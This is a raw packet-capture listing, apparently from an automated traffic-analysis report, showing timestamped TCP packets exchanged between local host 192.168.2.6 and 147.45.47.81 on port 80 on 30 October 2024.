                                                              Oct 30, 2024 15:44:46.031697035 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031708956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031723976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031728029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031747103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031761885 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031766891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031778097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031795025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031801939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031811953 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031827927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031837940 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031843901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031867027 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032463074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032479048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032494068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032509089 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032608032 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032643080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032658100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032674074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032697916 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032713890 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032721043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032732964 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032736063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032751083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032764912 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032772064 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032780886 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032794952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032809973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032814026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032824993 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032835007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032841921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032857895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032860994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032874107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032888889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032905102 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032906055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032921076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032927990 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.032936096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.032954931 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.033433914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033535957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033550978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033564091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.033575058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033581018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.033590078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033606052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033621073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033626080 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.033638000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033652067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033653021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.033668041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033690929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.033691883 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.033726931 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034171104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034296989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034312963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034327984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034337997 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034342051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034357071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034365892 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034372091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034393072 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034396887 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034411907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034425974 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034427881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034442902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034459114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034461975 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034476042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034499884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034502029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034513950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034529924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034533978 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034544945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034560919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034563065 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034575939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034591913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034596920 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034607887 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034624100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034631968 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.034638882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.034656048 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.041225910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.054740906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.054797888 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.054831982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.054837942 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.054867029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.054872990 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.054918051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.054968119 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.054971933 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055001974 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055035114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055053949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055068016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055111885 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055119038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055151939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055185080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055191994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055217981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055252075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055263042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055285931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055337906 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055340052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055378914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055428028 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055435896 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055479050 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055519104 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055527925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055562019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055610895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055614948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055644035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055680990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055685997 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055715084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055748940 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055759907 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055782080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055814028 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055819988 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055846930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055879116 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055883884 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055917025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055954933 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.055954933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.055989027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056021929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056046963 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056055069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056087971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056103945 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056123018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056154966 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056164026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056190014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056222916 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056231976 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056257010 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056289911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056298018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056323051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056368113 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056371927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056410074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056446075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056453943 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056479931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056514978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056535959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056550026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056582928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056596994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056617022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056651115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056664944 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.056685925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056715012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.056725025 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.057776928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.057828903 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.057883978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.057918072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.057951927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.057957888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.057985067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058021069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058034897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058072090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058113098 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058124065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058156967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058188915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058196068 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058239937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058279037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058290958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058324099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058357954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058362961 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058391094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058425903 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058428049 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058459044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058491945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058495998 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058525085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058558941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058563948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058592081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058625937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058633089 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058660030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058695078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058698893 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058727026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058759928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058767080 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.058794975 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.058829069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.067930937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.067987919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.068036079 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.068037033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.068070889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.068106890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.068110943 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.068140030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.068173885 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.068176031 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.083488941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.083522081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.083558083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.083564997 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.083600044 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.084419966 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084450006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084497929 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.084501982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084553957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084587097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084599018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.084621906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084655046 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084664106 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.084690094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084723949 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.084734917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.089539051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089596987 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.089679003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089711905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089745998 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089766026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.089797020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089842081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089843988 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.089874029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089907885 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089914083 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.089940071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089972973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.089981079 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090006113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090040922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090053082 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090074062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090109110 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090114117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090141058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090174913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090207100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090214968 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090240955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090251923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090610981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090642929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090662003 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090694904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090737104 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090744019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090797901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090837955 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090846062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090878963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090914965 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.090945959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.090964079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091012001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091023922 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.091044903 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091084957 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.091092110 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091126919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091159105 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091169119 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.091192961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091223955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091231108 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.091258049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091290951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091309071 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.091346979 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091378927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091392040 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.091413975 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091445923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091471910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.091481924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091515064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.091521025 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.094635010 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.094691038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.094695091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.094728947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.094763041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.094765902 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.094798088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.094837904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.106189966 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.106223106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.106272936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.106276035 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.106307983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.106339931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.106359959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.128071070 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.129417896 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.148400068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148461103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148473024 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.148495913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148538113 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.148572922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148648977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148699045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.148706913 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.148732901 CET8049995147.45.47.81192.168.2.6
